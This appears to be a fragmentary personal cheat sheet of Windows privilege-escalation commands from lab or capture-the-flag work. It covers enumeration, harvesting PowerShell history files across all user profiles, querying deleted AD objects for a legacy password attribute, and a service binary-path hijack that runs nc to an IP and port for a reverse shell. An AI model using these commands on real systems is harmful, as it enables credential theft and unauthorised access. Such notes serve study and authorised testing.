https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md

icacls root.txt /grant alfred:F

powershell -c "tnc 10.10.14.33 -Port 135" (tnc = Test-NetConnection; TCP port reachability check, ping-like)

where /R c:\ bash.exe

dir /q /a /s


‣.exe

Config-based privesc checks

https://github.com/GhostPack/SharpUp.exe

Patch-level / missing KB exploits


dir -force #always

whoami /all

for %i in (Documents Downloads Pictures Contacts Desktop Favorites) do @dir /s "C:\\Users\\%USERNAME%\\%i"

Check C:\\ & C:\\Program Files & Public as well

Import-Module PSReadLine
gc (Get-PSReadLineOption).HistorySavePath; type $Env:UserProfile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt; foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
# Enumerate PSReadLine history across all profiles (silently skip missing)
foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

# Check deleted AD user objects for the cascadeLegacyPwd attribute
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' `
  -IncludeDeletedObjects -Properties * |
  Format-List *

netstat -ano | findstr "TCP"

ipconfig

arp -a

If you can edit a service binary path ( sc qc [service]) (sc config [service] nc ip port) (sc stop [serv]) (sc start [serv])